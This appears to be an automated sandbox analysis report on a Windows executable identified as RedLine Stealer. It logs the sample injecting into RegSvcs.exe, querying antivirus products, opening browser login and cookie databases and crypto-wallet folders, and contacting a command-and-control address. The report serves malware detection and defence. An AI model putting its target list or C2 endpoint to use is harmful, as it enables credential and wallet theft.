Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.1432206426.00000000062C8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Z6ojPnRBp1.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7796, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Z6ojPnRBp1.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7796, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Z6ojPnRBp1.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7796, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	11 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	2 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Z6ojPnRBp1.exe	66%	Virustotal		Browse
Z6ojPnRBp1.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
Z6ojPnRBp1.exe	100%	Avira	TR/Kryptik.gjfvw

Source	Detection	Scanner	Label
http://45.137.22.249:55615t-	0%	Avira URL Cloud	safe
45.137.22.249:55615	0%	Avira URL Cloud	safe
http://45.137.22.249:55615	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
http://45.137.22.249:55615/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb.cdn.cloudflare.net	104.26.13.31	true	false		high
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ip.sb/geoip	false		high
45.137.22.249:55615	true	Avira URL Cloud: safe	unknown
http://45.137.22.249:55615/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmpA13A.tmp.2.dr	false		high
http://www.fontbureau.com/designers/?	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	false		high
http://www.fontbureau.com/designers	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	RegSvcs.exe, 00000002.00000002.1423005666.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	RegSvcs.exe, 00000002.00000002.1423005666.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	false		high
http://www.founder.com.cn/cn/cThe	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.249:55615t-	RegSvcs.exe, 00000002.00000002.1423005666.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
